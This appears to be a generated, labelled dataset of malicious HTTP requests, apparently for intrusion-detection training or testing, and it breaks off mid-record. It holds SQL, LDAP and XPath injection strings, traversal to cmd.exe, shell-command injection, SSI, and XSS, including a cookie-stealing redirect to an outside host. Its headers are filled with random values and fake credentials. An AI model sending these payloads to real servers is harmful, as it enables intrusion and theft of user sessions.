If-None-Match: "gga56pZViP-pPxuf@g8W"
If-Range: Thu, 21 Dec 06 21:53:46 CET
Max-Forwards: 0
MIME-Version: 0.5
Pragma: Ne='SeAeW'
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: ep9mla t3deafei=hrshcr
Range: 2174-,56-,-57382
Referer: /0aNy/eSiqFi.html
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: asadcTpne/4.2.9
UA-CPU: 68000
UA-Disp: 2301,334,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0710x100
Via: HTTP/0.6 www.oatmc.gif:2
Transfer-Encoding: gzip
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 499 www.ObTif.js "Thryti" 
X-Forwarded-For: 1.179.155.203
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47726
Start - Id: 49654
class: XPathInjection
GET /hl0dt/uca/Oa/BXhaving-rawW/o9be2/eHuSyw.L4i.v/tx/jo/sNShLxx@vihZ_UGrYJQ/igWItXe6ofeaftizsAne/n7/c1euo2xoan.tiff?oeheo3slgewgm=eas%27+++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28++i+%2B+++j++++%2B++k%2B+++l%2B++1%29%5D+++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+%27No%27%3D++%27+++OvsntE%27+++or HTTP/1.1
Host: 109.219.185.193:3879
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-stale=528
Client-ip: 135.193.196.43
Cookie: otnzciziupt=66361746;orhtup=sig5m
Cookie2: $Version="00"
Date: Sat, 12 Jan 08 15:18:54 CET
ETag: "XG5vP6R7j2LObHQwr_qp"
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Tue, 02 Sep 08 15:32:59 GMT
If-Unmodified-Since: Fri, 18 Jan 08 24:43:53 UTC
If-Match: "jYY8d0BaX2@uU0Tj_D10"
If-None-Match: "oVmYmNEUdktryqEd_8"
If-Range: Thu, 26 Nov 09 13:48:13 GMT
Max-Forwards: 793
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest opaque="eakhrn"
Range: -377,00-3
Referer: http://www.Errniw.fr/aaLnogoe/curaeSzM/g1otd.mdb
TE: trailers,gzip;q=0.6
Trailer: Via
User-Agent: Mozilla/1.8 (X11; U; Unix 5.4; e5-ko; rv:0.9.9) Gecko/78230909
UA-CPU: PowerPC
UA-OS: Windows NT
Via: tit3a/4.8 188.75.119.134
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
X-Forwarded-For: 18.19.238.4
X-Serial-Number: 6227960024150
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49654
Start - Id: 47713
class: XSS
GET /57nH9d2kLAoYmuV./vy/ioeTdt1/stEo4s/lsevm/e5utTi8sk.png?hohmeceihdi=s%40kN&reeeawi9=%3Cxml+++++src%3D+++%22+++++javascript%3A+%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.ilndse.com%2Fcgi-bin%2Fasnsitasti.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22%3E&_qcNJ=51320656&aeary9eshrtnfsI=dweaqpflvkulsw3bfa&tesizrn=aobs5%3DbtrgtBada&iTmt=iutimteg&.K_sU=t&stlC=8398027&kid=fbiiyhjctll0u HTTP/1.0
Host: 160.215.94.94:80
Connection: close
Accept: image/png, video/quicktime;q=0.3, image/*;q=0.6
Accept-Charset: iso-8859-7;q=0.6, iso-8859-9, x-mac-chinesetrad, x-mac-roman, windows-1252
Accept-Encoding: gzip, gzip;q=0.1, identity;q=0.6, compress;q=0.0
Accept-Language: 3ncevh-ulhmTlh;q=0.8, foS-n, wz-n, sna-ysb0w;q=0.4
Cache-Control: no-cache
Client-ip: 62.177.179.140
Cookie: HeeamatrenbnE=659
Cookie2: $Version="5"
Date: Tue, 20 Nov 07 02:02:05 UTC
ETag: "o8srXj_tTzX-96_kyD"
Expect: eAkt=es3Stmno
From: Nhksen@i9nwketoNw.gov
If-Modified-Since: Tue, 02 Nov 04 09:16:53 CET
If-Unmodified-Since: Mon, 13 Dec 04 11:24:05 GMT
If-Match: "uTeelEarBVxwdPWk"
If-None-Match: *
If-Range: *
Max-Forwards: 9247
MIME-Version: 1.4
Pragma: 5nkTai=e
Proxy-Authorization: Digest realm
Authorization: NTLM b2lyb3Rzb2hiYXBpbGlhbkxBZ2hkdWVybWx5b2hjdnNyZXJjZVRoc2F0aEdqaU8=
Range: 2174-,56-,-57382
Referer: /rot8ok/yeyiah.avi
TE: trailers,deflate
Trailer: Date
User-Agent: Mozilla/9.9 (Windows; U; Win 9x 5.6; au-Iu; rv:7.5.1) Gecko/34818790
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5167x472
Via: 6.0 www.gem9.js, 4.9 68.33.210.1:260, djl/9.9 www.m5ord1.html
Transfer-Encoding: o8pah; ieeir=roso9a
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47713
Start - Id: 36160
class: PathTransversal
GET /afm1s/noAhA.Xw5OIjn.tiff?V3ru=zl0at&Boojsovnwt=%3Beer%3Fc%3Ddrxp_AtE&04lps=lscib&AxhtoksNrd=SAwp-+%3A5+stegoi%3Csock_streamr%5Byl&SpYXL=6LKp&dt=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fneiedearic%2Fna%2Felat%2Fralaitie.aspx&dGtmea=C&tcagTetnia=H&so=srirt8adjt&j@VL_=rTeLon&aHLwherebphpGL5we=nlr HTTP/1.1
Host: www.to73tOvh8l.cz
Connection: close
Accept: */*;q=0.4
Accept-Charset: windows-1250, iso-8859-8-i;q=0.2
Accept-Encoding: gzip;q=0.7, deflate, deflate;q=0.3
Accept-Language: nl2ni-tke;q=0.4, kemwn-sedlMaw
Cache-Control: no-transform
Cookie: wTetd=execs06s
Date: Wed, 13 May 09 15:33:19 CET
ETag: W/"p7qElbYY5v6UDzs4VZ"
Expect: 100-continue
From: rmee3leS@lenn.de
If-Modified-Since: Mon, 01 Sep 08 03:38:59 UTC
If-Unmodified-Since: Sun, 02 Apr 06 07:56:51 GMT
If-Match: "ElzUMg79vsWjlYT-UWa"
If-None-Match: "9ld4.5zpQRSdQHRa@"
Max-Forwards: 70
Pragma: no-cache
Proxy-Authorization: Basic Nmk1OGlyOnNIb2VmZQ==
Authorization: Basic ZmNpc2VkOnNob2M=
Range: 883-12,6163-,33622-
Referer: http://www.smswcr.be/GwMrcnhe/myoohn/tadz/pholr.cgi
TE: trailers,gzip
Trailer: Accept-Encoding
User-Agent: th4pa0nttN (fDWUiPtU; 8sADq3RqyV; va79x-; drslcB)
UA-Color: color8
UA-Pixels: 5546x388
Via: FTP/4.8 224.9.212.121, HTTP/9.2 www.ailaoa.gif, HTTP/3.4 115.105.189.66
Transfer-Encoding: ensiie
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 216.87.210.13
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36160
Start - Id: 38474
class: LdapInjection
GET /sQRdWuP2bqjNMJ/kD-/md9ngeoeaenHiphsrtm/yeeuMsfbyhxWvE5e.swf?aehystezozeo=%29++%28+%7C+++%28displayName%3Dhad*%29++++%28name++%3D+++had*++++%29%28mail%3Dhad*++++%29&eyehhcOrlt=ieooe HTTP/1.0
Host: www.nnuingfya.gov:3992
Connection: ssisoaIt
Accept: video/mpeg;q=0.6, application/*
Accept-Charset: iso-8859-5, x-mac-roman;q=0.0, x-mac-turkish;q=0.5
Accept-Encoding: 
Accept-Language: arwae-0dgo;q=0.8
Cache-Control: no-transform
Client-ip: 23.7.129.65
Cookie: noiatSeen=462VQqZi3wzp;prz9Lt=51852086;rrei=)yiwhereoc?risimgrt;oereD=btpkeoto
Cookie2: $Version="554"
Date: Fri, 24 Jul 09 02:06:14 CET
ETag: W/"HdLDJ1hGjmZABeS"
Expect: betmtr=nyjiso;hCgrf6g
From: odvt@tmdyhis.org
If-Modified-Since: Tue, 01 Nov 05 05:50:47 GMT
If-Unmodified-Since: Wed, 02 Nov 05 21:26:07 UTC
If-Match: "YvDv9TrIFAa__EZrGJn"
If-None-Match: *
If-Range: Sun, 12 Nov 06 19:09:52 CET
Max-Forwards: 7308
MIME-Version: 6.7
Pragma: tsdp0due='hpl'
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: NTLM YThnZW5wb3RrY2dFc2Rod2RvSHVicml5dTJhRHN1Y2xiYWh0aG5tdG5kYVF4
Range: 24-,76759-,-19589
Referer: /osbe/tNuj3b/ejzveou/epdnc4/gRtnn.asp
TE: chunked,gzip,gzip
Trailer: Cache-Control
User-Agent: Mozilla/8.2 (Machintosh; U; Mac OS X 2.3; m9-Sr; rv:1.9.4) Gecko/35507522
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: HTTP/8.2 www.esNa.jpg, HTTP/4.2 50.206.238.222, 1.4 77.17.13.166
Transfer-Encoding: deflate
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 863 www.oneLt.gif "lrRpIern" "Sun, 11 Oct 09 06:27:08 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38474
Start - Id: 42392
class: SqlInjection
GET /SEUjXZ/e9sh/fdisesoeOrtebf/lFyiu2/aJ7W/tUv/npcn1QLhJrO/wireeomeIaiCenetn/5HF.exe?reOitveoslgf=%27++++%29++++UNION+++++ALL+++SELECT+++++%27esqodr9Ay%27%2C3%2C09%2C%27muOPyteeh%27%2C1258+++++FROM+1eaer9x+++WHERE+++%28+++%27%27+%3D+%27 HTTP/1.0
Host: www.3ytibtoNef.cz:80
Connection: close
Accept: application/zip
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: rrseea-runt9cm, ee4c-d9wdc;q=0.7
Cache-Control: max-stale
Client-ip: 173.58.91.50
Cookie: s8la=689;oaontwti=access_log;OYe_mxLxwQ@=363350435
Cookie2: $Version="2"
Date: Mon, 08 Jun 09 11:09:28 CET
ETag: "CDmsLIMNDEVrfaLecxl"
Expect: 100-continue
From: erTuul@i55mmhby.gov
If-Modified-Since: Thu, 12 Nov 09 12:32:09 GMT
If-Unmodified-Since: Fri, 02 Mar 07 11:53:41 UTC
If-Match: "r5NTx6DAobWciNVPbC7N"
If-None-Match: *
If-Range: Thu, 03 Aug 06 01:18:18 UTC
Max-Forwards: 9
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: hVsby7 Ii6eef=veeOhti
Range: -012964
Referer: http://7vz73eee.st/iLeb.mdb
TE: trailers,deflate
Trailer: Host
User-Agent: Mozilla/7.1 (Machintosh; U; PPC 7.2; 6a-Om; rv:1.8.7) Gecko/68240894
UA-CPU: StrongARM
UA-Disp: 8289,132,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 5.0 www.otios.html
Transfer-Encoding: deflate
Upgrade: rse/1.1, o5mn/7.6, zlr3/8.8, or7Eaa/3.4
Warning: 999 147.111.219.75 "f2re1Ss" 
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42392
Start - Id: 39356
class: SSI
GET /@g/dxpCoF7FzlYPDvwivTk/Y2Zbetween7/net87ie/8u/zpnvC6t2sS/tNSMurissoopnfdgo/iz_.php?ashuirro=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: www.Eosi.it
Connection: eo1o
Accept: application/*;q=0.2, text/xml;q=0.7, application/*
Accept-Charset: *
Accept-Encoding: identity;q=0.6, deflate, identity;q=0.2, deflate
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 183.110.148.152
Cookie: 9nt=oo9eHatyr;ctsEaihlssrs=n lservicese;TdEKEFh.VWH=qlfd9-ae9uc;meeuotbsE2eem=e~sssock_streamer]xoupdateeziadminf;np=99380246;Mpyg=84671480
Cookie2: $Version="92"
Date: Sat, 04 Feb 06 07:34:42 UTC
ETag: W/"@4NOJSZ4ADlYgjcuK"
Expect: 1eaet=xvho;paeeore=ucea
From: ztifisTh@itMb.uk
If-Modified-Since: Wed, 25 Jul 07 24:32:20 UTC
If-Unmodified-Since: Mon, 27 Sep 04 10:00:34 CET
If-Match: "0Ms39NikF286_k.GHIWg"
If-None-Match: "kyW_H@6G9d84fr9Ug_uT"
If-Range: *
Max-Forwards: 919
MIME-Version: 9.5
Pragma: TvaB0Aov='rs4hjrt'
Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Basic bWVvM2E4bWE6eWtvYw==
Range: 1-35,9436-,-246816
Referer: http://sSrb9pz.biz/yUmZf/3dndlc.dll
TE: trailers
Trailer: Referer
User-Agent: adizeime (wksRZ9jfTk; dPy8W64sA; tZiL8R)
UA-CPU: 68000
UA-Disp: 6337,771,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: 0.5 www.giaaAl.tiff, 2.8 www.faoe.css, 5.0 114.64.76.24
Transfer-Encoding: deflate
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 944 www.Jaealoez.html "Tccdyealtgcne" "Wed, 07 Dec 05 16:52:07 UTC"
X-Forwarded-For: 247.166.24.114
X-Serial-Number: 385637154
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39356
Start - Id: 47927
class: XSS
GET /nTSkYfb-Klink8YPPX/iFudK2Akbf7/rp.jpg?tnujh2reb=rcnh3&yoaes=1ttivara&fqwb6t=83560960&etot3nTE=724152656&o0stshg=732&epep=%3Cdiv++style++%3D%22++++binding%3A++++url%28%5Bhttp%3A%2F%2Fwww.ndndmeer.com%2Fscript%2F3P4j7.mspx%5D%29%3B+++++%22+%3E&i1UiesahokfoLzh=m-%3Asp&ixpttibpeHfxo=hfNahtcsDoNhvrefta&uml=3r%28+e&frHm=480359&ntef2fll=aeNunwiftpseenph-snxyn&xterm0dBMyNFRG=3498985431&bdtHats=uqUJOmm_ac&eo0uureejwzinxh=25918&zo7unris6ynthee=01 HTTP/1.0
Host: 179.97.60.0:57345
Connection: close
Accept: image/png;q=0.4, audio/*, application/rtf;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=0
Client-ip: 123.204.156.42
Cookie: ehrneiekgy=hgiise;IULVDFwZN5V=99872;Mqti=56;nctmpBZzs7winntwhere=25889;includeCMcopyZinsertPm_ET=7rnoNmr7;aexb92ebkeI=61372
Cookie2: $Version="61"
Date: Fri, 15 Jun 07 01:09:56 GMT
ETag: W/"zaALvGTogQK3DnCL5"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: T5cc@hrqtf.uk
If-Modified-Since: Thu, 28 Oct 04 09:11:01 UTC
If-Unmodified-Since: Mon, 11 Jun 07 09:54:16 GMT
If-Match: "T788q.df5_DcV@5k"
If-None-Match: "T9g_wsGtHyAHRhRw@z"
If-Range: Tue, 07 Aug 07 01:36:24 UTC
Max-Forwards: 4800
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: xm5Eoo cesOKwc=keom4
Authorization: Basic c250RGlZaTozZXl1TWxs
Range: -6
Referer: http://www.slSt.be/bb3jbO9/Etnee/1eAkol/ITwSg.swf
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: toohh6dEe/7.7.4
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 229x467
Via: 9.9 217.215.191.236:77772, 21dee/5.3 www.mhaqwte.jpeg
Transfer-Encoding: gzip
Upgrade: fxd/6.1, eet/0.1, fuo/9.7, elrnan/6.1, mmna/4.6
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 03181480810
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47927
Start - Id: 37089
class: LdapInjection
GET /oeUea/iN5u0H@PEAnlKTI/hnae/lZkvCqefruLDwgfs/rvX@/axL4NFrreJgoOYFzc.jpeg?ndkzcsadtimoRso=232637&art7=c6dbody%3C+froma&oat=5411924214&tea0mNis=btoQieusrrht&glsnoiloi=pnss&tnInemtsci=34&ee6nmls=9585%29%28%26%28objectClass%3Dns8%29%28%7C%28sn++++%3D++++ho0%29%28cn%3Dcy+++J*%29%29&ijjwbk4cpEths=edvbscriptf&Iat=tgXx34V&retx7r=09&ddoo=fu%29Ti&XMZRv6OandSYU=daritnxuCTnebksl HTTP/1.1
Host: 62.243.32.251:80
Connection: keep-alive
Accept: audio/*;q=0.7, image/gif;q=0.1, video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.4, deflate;q=0.3, deflate;q=0.0, identity
Accept-Language: *
Cache-Control: ls=el
Client-ip: 237.22.129.42
Cookie: wrc=0d|h5intteasystemusipassthru7;oghaatie7bo=u_Q0cOC;ekcqxwyXFa6x=9Rhpw6iSowh/ngeayr
Cookie2: $Version="6"
Date: Sun, 30 Apr 06 15:21:23 CET
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: 100-continue
From: 0res@4luu6h.st
If-Modified-Since: Wed, 28 Sep 05 09:23:58 GMT
If-Unmodified-Since: Wed, 14 May 08 09:03:00 UTC
If-Match: "6gh_5d5TaI-wsSD"
If-None-Match: *
If-Range: "ZtapEphV2gNgqeiD3C"
Max-Forwards: 513
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: Basic czJhc0Vkcmg6cG5lbnNpcnQ=
Range: -02647,-19,13378-743741
Referer: http://www.lneniars.org/vf5v.php4
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/0.6 (Machintosh; U; Mac OS X 8.8; db-ht; rv:0.8.3) Gecko/38106796
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7857x018
Via: HTTP/2.4 www.9nee.js
Transfer-Encoding: deflate
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 620 www.gRricn.htm "alTyesjrtent3" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 252851
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37089
Start - Id: 46515
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.0
Host: 39.63.234.62
Connection: Rsi2s93p
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.6
Cache-Control: snqten6=t
Client-ip: 217.88.94.178
Cookie: rtn9wiyuark=ehl~?weweallaeallalk&L;b;roOr=gimcnzso3rax;a1tc=nf9-Jt.e3Iy;N6xNeursEr=aVueu;hge9issNrn=inhe9ocrg
Cookie2: $Version="1"
Date: Sun, 13 Feb 05 08:32:09 CET
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: 100-continue
From: csa3iee@teat.com
If-Modified-Since: Sun, 05 Oct 08 09:48:09 GMT
If-Unmodified-Since: Fri, 29 Feb 08 01:32:03 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Jul 08 23:46:15 UTC
Max-Forwards: 0
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: NTLM d29nc2tzd2ZJbnlsZGNmY2l1dHQ3Z3FzYWdvNG9tZXNmb3RzVG5sdHpxN3Nlcg==
Range: -97604
Referer: /oNli6.htm
TE: chunked;q=0.5,gzip
Trailer: Pragma
User-Agent: Mozilla/6.2 (X11; U; Linux i586 5.3; ji-nu; rv:0.8.6) Gecko/82098663
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: HTTP/5.6 186.35.189.146, 4eg3/3.9 77.123.53.205:9864
Transfer-Encoding: compress
Upgrade: eAeah/1.9, srlfi/6.1, 8t24e/5.5
Warning: 496 54.104.249.69 "iplf" "Fri, 06 May 05 07:10:25 GMT"
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 46515
Start - Id: 47394
class: XSS
GET /ebPhVqAzhh0oo/LjvB%u21ya@/rlsijes/o8sTRhcn/pIsehse2dehieeseR1o/7jiDOx8fcWn/voE.XN4ppw5/SB7.oJx/rleioCizdtbyklelee4/acambodreeaul.bin?jB59homeJY=8102813&ott1=tetmp&stonahvq=sqh%3Euol+vbscriptaoftwgeth&ss=gWemyneaa&Nnp=%3Ca+++href++%3D+++%22++javas%26%2399%3Bript%26%2335%3B%5Balert+%28%27eidwoeed%27%29%3B%5D++++%22++%3E HTTP/1.0
Host: www.Ceoa0tT.org
Connection: keep-alive
Accept: application/*, image/jpeg, text/html;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, compress;q=0.5, gzip, gzip;q=0.5
Accept-Language: f-ocsrynnu, ei-nirhfpu, hofEgnlI-ieti
Cache-Control: no-cache
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="92"
Date: Tue, 28 Mar 06 06:25:00 CET
ETag: W/"Zs@tcgHlxs@J9KnP77n"
Expect: 100-continue
From: hoetafry@daffCU.org
If-Modified-Since: Fri, 12 Nov 04 03:42:00 GMT
If-Unmodified-Since: Fri, 16 Sep 05 21:30:18 GMT
If-Match: "IGzop34q3uPZrSr"
If-None-Match: *
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 5
MIME-Version: 4.8
Pragma: u='a'
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: Basic b2ZlazEwYTE6dGZlTHUz
Range: 5469-3,1126-
Referer: /etcbd/sSee6.tar.gz
TE: chunked;q=0.3,gzip;q=0.2
Trailer: Expect
User-Agent: r_Bi48wgp http://www.e2edcid.net
UA-CPU: StrongARM
UA-Disp: 0322,0692,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1670x058
Via: 5.0 www.qraark.shtml
Transfer-Encoding: deflate
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 270 120.123.100.132 "hvi74Edbooyr" "Mon, 07 Jan 08 14:05:19 UTC"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 6529673477463
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47394
Start - Id: 44401
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.asie.gov
Connection: close
Accept: image/png;q=0.4
Accept-Charset: x-mac-arabic;q=0.3, euc-tw;q=0.2, iso-8859-2;q=0.2, x-mac-japanese;q=0.2
Accept-Encoding: *
Accept-Language: vh9nnri-nis;q=0.5, s-nyc2ry, si8leli-tf, tciu-ihze6bp;q=0.4
Cache-Control: ai=ahc5
Client-ip: 145.27.27.144
Cookie: shjevaSH=nph-eTEe;noaqfw4ro=dzPciawn7nhncaottr
Cookie2: $Version="556"
Date: Tue, 13 Apr 04 04:36:04 UTC
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: r1irf=e82e8ds;ueIe
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Sat, 15 May 04 08:04:34 UTC
If-Unmodified-Since: Wed, 18 Jan 06 23:52:19 CET
If-Match: "S380h@AwL-rl1Y_x4"
If-None-Match: *
If-Range: "-vNmnqdmEAFkbxqkELej"
Max-Forwards: 9
MIME-Version: 6.5
Pragma: eEl=bs
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Digest realm
Range: 6-459,-64787
Referer: http://50nynh.de/e7ardVS/hyaxomsd/Vu8eUnbr/tuuNet/hnhxctpo.gif
TE: gzip
Trailer: From
User-Agent: c8ta6rUcie/1.6
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6396x837
Via: 8.9 www.cslitr.js:32
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44401
Start - Id: 35358
class: SqlInjection
GET /llzZUF7vStTIi5OF-/tiauf9h1LdTfi/oulihl7iosacsno/6XhymykurLAzG2g@/eostnnrrh/L4D6bmYDF03.htm?oC-ldeS1T=wsneAmx+w%3Dtidswda&rodolc2a=rn0RuO2sJ3&siza=2iyusd0&0ReT=hc+s%25c+&eMeyjtchnNrsq5n=fnitftqlElIrne&st=202851&tsp9g7sr=016401853&dlansqrlsreko=e7n&Stheartac5Sn=1098&ea8fgwida=telnet%2F&ee8tclTenm=OR++++%27Tae6mEd%27+++++BETWEEN++++%27R%27+++++AND+++%27T%27 HTTP/1.0
Host: 79.86.200.65
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.3
Accept-Language: *
Cache-Control: max-age=761
Client-ip: 122.232.49.16
Cookie: 3woNlejepd=llurs;Hfnna8ee=j;rhy
Cookie2: $Version="194"
Date: Mon, 09 Mar 09 02:27:44 CET
ETag: "B6_UDH4KS-1i1Exc6"
Expect: 100-continue
From: ruin@msg0oh.fr
If-Modified-Since: Sat, 11 Apr 09 08:25:40 UTC
If-Unmodified-Since: Wed, 12 May 04 19:14:04 CET
If-Match: *
If-None-Match: "ueeJa0Dl8Tb3UVx"
If-Range: Tue, 10 Jul 07 16:52:19 GMT
Max-Forwards: 937
MIME-Version: 6.8
Pragma: uuOfoxn='nr'
Proxy-Authorization: NTLM VGVkNHBpZjUzc3l6dm5wZ3RtdG5kb2FoM2RuZW5vdTJhc3Rvb2ZycHNoc2g=
Authorization: tatos 8nlSpeje=8eoUwrs
Range: 1609-18413
Referer: http://Rrish.net/5rsa/eyteeta/7b8ai8/uandr/6sEees.php
TE: trailers,chunked;q=0.5
Trailer: Host
User-Agent: n6zLv/5.9
UA-CPU: 68000
UA-Disp: 3189,7325,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 739x825
Via: FTP/7.3 6.71.223.24, ehnkA/5.9 www.amip.tiff
Transfer-Encoding: identity
Upgrade: gerh/9.6
Warning: 445 236.92.54.164 "ihposkezh6eanidatou6" "Sun, 23 Apr 06 11:05:08 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 06713
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35358
Start - Id: 36773
class: OsCommanding
GET /lNmqPmshTEv4Fa52@/oohGET/uPZCFCFZR7yI5v/tVOuq/VaRz/ddarrl8lt/eSnj.bin?XI392gGM8kW=+boot.inisataid%28cio&s2YftL9sh7ovl=lhpJr7Y&rea=saE&qttAeamGThe=42850098&9D2tri9=%7C++++echo+++%22++Content-Type%3A+text%2Fhtml%22+++%3B+++++echo++++%22%22+%3B+id+++%5C0&at=adC-&gnxmel=1160&slryi8t=jrt7afbtaohfi&niroobtun=reweofwlHArs&lsuegc=sxmcpe5hfG&LifHswscripty=8504&cohnqdgr=s-HNSd0Crb&Al0r=T HTTP/1.1
Host: 182.187.110.22:80
Connection: close
Accept: text/html;q=0.2, application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: axnog8-E, le-aa, oiDapo-grL2Rv;q=0.7, aw-MdrHoc, gh1ite-osr7tos;q=0.6
Cache-Control: no-transform
Client-ip: 177.87.216.64
Cookie: Isx=e(
Cookie2: $Version="4"
Date: Wed, 07 Apr 04 07:07:37 UTC
ETag: "cVJDZYCIgSRT74iSj-"
Expect: 100-continue
From: hqdnlp@uehby4G.ch
If-Modified-Since: Fri, 29 Jun 07 15:30:04 UTC
If-Unmodified-Since: Wed, 29 Sep 04 18:08:16 CET
If-Match: "ImJfcXMM2cph9T_d"
If-None-Match: "YzaWyouLc60m-OQx"
If-Range: "QU.j350IZO40kg8V"
Max-Forwards: 18
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic aWhvNWg6ZWZ0RGR5cg==
Authorization: Digest response="eAcCed11F3755c174dd9353a700c5b0e"
Range: -0
Referer: http://qhh32.ch/gHhsbee/6mTgnns3/teifoar/si6mtvb.cfm
TE: chunked,chunked
Trailer: If-None-Match
User-Agent: Lzcylh (bE4-61L; iczP3Rl1; ekJJlFEn2; sd6veSRP)
UA-CPU: PowerPC
